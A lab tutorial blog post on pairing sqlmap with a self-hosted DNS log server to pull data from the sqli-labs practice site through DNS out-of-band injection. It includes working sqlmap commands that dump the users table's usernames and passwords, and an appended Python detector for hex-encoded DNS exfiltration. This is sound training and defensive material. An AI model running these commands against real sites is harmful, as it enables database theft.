
sqlmap combined with dnslog fast injection

2022-08-10 23:49:00 hug kitten

How to use sqlmap combined with dnslog to inject quickly

First we need three virtual machines: one Windows 10 machine as the client, one Windows Server 2008 machine as the server, and one Kali machine.

Step 1: Download the phpStudy panel on Windows 10, then download the sqli-labs practice lab and put the sqli-labs files into the WWW directory

Step 2: Modify the database configuration file: add secure_file_priv="" to the database's my.ini so that files can be read later

Step 3: Set up a DNS server on Windows Server 2008

Click Roles-->Add Roles-->Server Roles-->select DNS Server-->Next-->Install

Right-click WIN-JGVPSZCQ80R and open Properties-->Monitoring-->tick the two test types-->OK

New zone: right-click-->New-->Next-->enter a custom zone name-->Next-->Finish

Create a new host ns1.ceshi.top and fill in the IP address of the Kali virtual machine

Create a wildcard record as well:

Step 4: On Windows 10, configure the IP address of the DNS server

Step 5: From Windows 10, ping the domain name created on the DNS server and view the query on Kali

Step 6: Create a forwarder on Windows Server 2008

From Windows 10, ping the forwarder's domain name and view the query on Kali

Step 7: Use sqlmap with DNSlog out-of-band injection

Use sqlmap to list the table names in the database

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D security --tables

List the columns of the users table

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -T "users" --columns

Dump the data from the users table

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -T "users" -C "username,password" --dump
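
Seen from the defender's side, the out-of-band channel used in Step 7 appears in the DNS server's query log as many distinct names under one zone, all requested by the database host. The following added example (not part of the original post) groups such queries by client and zone and decodes the hex labels; the log format, the sample lines and the prefix.hex.suffix shape of the names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed DNS server query log, one "<time> <client> <qname>" per line.
# The "<prefix>.<hex>.<suffix>.<zone>" shape of the hello.top names is an
# assumption about how hex-encoded data is carried in query names.
SAMPLE_LOG = """\
2022-08-10T23:40:01 192.168.112.139 www.example.com
2022-08-10T23:40:02 192.168.112.139 aqz.7365637572697479.kpw.hello.top
2022-08-10T23:40:02 192.168.112.139 aqz.7573657273.kpw.hello.top
2022-08-10T23:40:03 192.168.112.139 aqz.61646d696e.kpw.hello.top
2022-08-10T23:40:04 192.168.112.50 deadbeefcafe0001.cdn.example.net
2022-08-10T23:40:05 192.168.112.50 ns1.ceshi.top
"""

HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){4,}$")  # even-length hex, >= 8 chars


def find_exfil_candidates(log_text, min_unique=3):
    """Group hex-bearing query names by (client, zone).

    Returns {(client, zone): [decoded payloads]} for pairs that issued at
    least min_unique distinct hex-labelled names under the same zone.
    """
    payloads = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines
        _, client, qname = fields
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # no labels below the two-label zone
        zone = ".".join(labels[-2:])  # naive: last two labels taken as the zone
        for label in labels[:-2]:
            if HEX_LABEL.match(label):
                text = bytes.fromhex(label).decode("utf-8", "replace")
                payloads[(client, zone)].add(text)
    return {k: sorted(v) for k, v in payloads.items() if len(v) >= min_unique}


if __name__ == "__main__":
    for (client, zone), data in find_exfil_candidates(SAMPLE_LOG).items():
        print(f"{client} -> *.{zone}: {data}")
```

The single hex-labelled lookup from 192.168.112.50 stays below the threshold, which is what keeps one-off hashed hostnames from being reported.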